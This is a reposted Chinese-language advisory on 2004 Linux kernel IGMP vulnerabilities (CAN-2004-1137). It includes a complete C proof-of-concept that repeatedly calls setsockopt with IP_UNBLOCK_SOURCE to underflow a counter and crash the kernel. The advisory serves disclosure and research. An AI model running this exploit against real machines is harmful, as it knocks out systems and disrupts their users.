分享
 
 
 

Linux kernel IGMP多个安全漏洞

王朝system·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

发布日期:2004-12-14

更新日期:2004-12-15

受影响系统:

Linux kernel 2.6.9

Linux kernel 2.6.8

Linux kernel 2.6.7

Linux kernel 2.6.6

Linux kernel 2.6.5

Linux kernel 2.6.4

Linux kernel 2.6.3

Linux kernel 2.6.2

Linux kernel 2.6.1

Linux kernel 2.6

Linux kernel 2.4.9

Linux kernel 2.4.8

Linux kernel 2.4.7

Linux kernel 2.4.6

Linux kernel 2.4.5

Linux kernel 2.4.4

Linux kernel 2.4.3

Linux kernel 2.4.28

Linux kernel 2.4.27

Linux kernel 2.4.26

Linux kernel 2.4.25

Linux kernel 2.4.24

Linux kernel 2.4.23

Linux kernel 2.4.22

Linux kernel 2.4.21

Linux kernel 2.4.20

Linux kernel 2.4.2

Linux kernel 2.4.19

Linux kernel 2.4.18

Linux kernel 2.4.17

Linux kernel 2.4.16

Linux kernel 2.4.15

Linux kernel 2.4.14

Linux kernel 2.4.13

Linux kernel 2.4.12

Linux kernel 2.4.11

Linux kernel 2.4.10

Linux kernel 2.4.1

Linux kernel 2.4描述:

CVE(CAN) ID: CAN-2004-1137

Linux Kernel是开放源代码操作系统Linux的内核。

Linux IGMP网络模块和对应的用户API存在多个安全问题,本地和远程攻击者可以利用这些漏洞提升特权,或使内核崩溃。

问题一存在于ip_mc_source()函数中,此函数可通过用户API(IP_(UN)BLOCK_SOURCE, IP_ADD/DROP_SOURCE_MEMBERSHIP,MCAST_(UN)BLOCK_SOURCE和 MCAST_JOIN/LEAVE_SOURCE_GROUP)调用,存在多个内核崩溃和内核内存覆盖问题。

通过递减'ip_sf_socklist'结构的'sl_count'计数器到0xffffffff,上面函数就会使内核进入无限循环,而导致内核崩溃。

随即整个kmalloc分配的内核内存会由于4字节的移位而引起突然机器重新启动,正确利用此漏洞可能造成特权提升。

问题二是由于问题一的原因,可能通过ip_mc_msfget()和ip_mc_gsfget()函数读取大量内核内存信息而造成内核溢出。使系统崩溃。

问题三存在于网络模块中的igmp_marksources()函数中,由IGMP组上下文调用,当接收到外部网络的查询时,由于对接收到到的IGMP消息参数缺少充分过滤,可导致一个越界读取内核内存问题,如果Linux机器支持多播的情况下,此漏洞可远程利用。

<*来源:Paul Starzetz (paul@starzetz.de

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110304192803108&w=2

*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Paul Starzetz (paul@starzetz.de)提供了如下测试方法:

/*

* Linux igmp.c local DoS

* Warning: this code will crash your machine!

*

* gcc -O2 mreqfck.c -o mreqfck

*

* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.

*

* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"

* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION

* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.

*

*/

#include <stdio.h>

#include <unistd.h>

#include <errno.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <linux/types.h>

#define MCAST_INCLUDE 1

#define IP_MSFILTER 41

#define IP_UNBLOCK_SOURCE 37

#define IP_BLOCK_SOURCE 38

struct ip_msfilter

{

__u32 imsf_multiaddr;

__u32 imsf_interface;

__u32 imsf_fmode;

__u32 imsf_numsrc;

__u32 imsf_slist[1];

};

struct ip_mreq_source

{

__u32 imr_multiaddr;

__u32 imr_interface;

__u32 imr_sourceaddr;

};

void

fatal (const char *message)

{

printf ("\n");

if (!errno)

{

fprintf (stdout, "FATAL: %s\n", message);

}

else

{

fprintf (stdout, "FATAL: %s (%s) ", message,

(char *) (strerror (errno)));

}

printf ("\n");

fflush (stdout);

exit (1);

}

int

main ()

{

int s, r, l;

struct ip_mreqn mr;

struct ip_msfilter msf;

struct ip_mreq_source ms;

in_addr_t a1, a2;

s = socket (AF_INET, SOCK_DGRAM, 0);

if (s < 0)

fatal ("socket");

// first join mcast group

memset (&mr, 0, sizeof (mr));

mr.imr_multiaddr.s_addr = inet_addr ("224.0.0.199");

l = sizeof (mr);

r = setsockopt (s, SOL_IP, IP_ADD_MEMBERSHIP, &mr, l);

if (r < 0)

fatal ("setsockopt");

// add source filter count=1

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_BLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt2");

// del source filter count = 0

// imr_multiaddr & imr_interface must correspond to ADD

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt2");

// del again, count = -1

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt3");

// crash

memset (&ms, 0, sizeof (ms));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

ms.imr_sourceaddr = inet_addr ("4.5.6.7");

l = sizeof (ms);

r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);

if (r < 0)

fatal ("setsockopt4");

getchar ();

return 0;

}

建议:

厂商补丁:

Linux

-----

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.kernel.org/

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有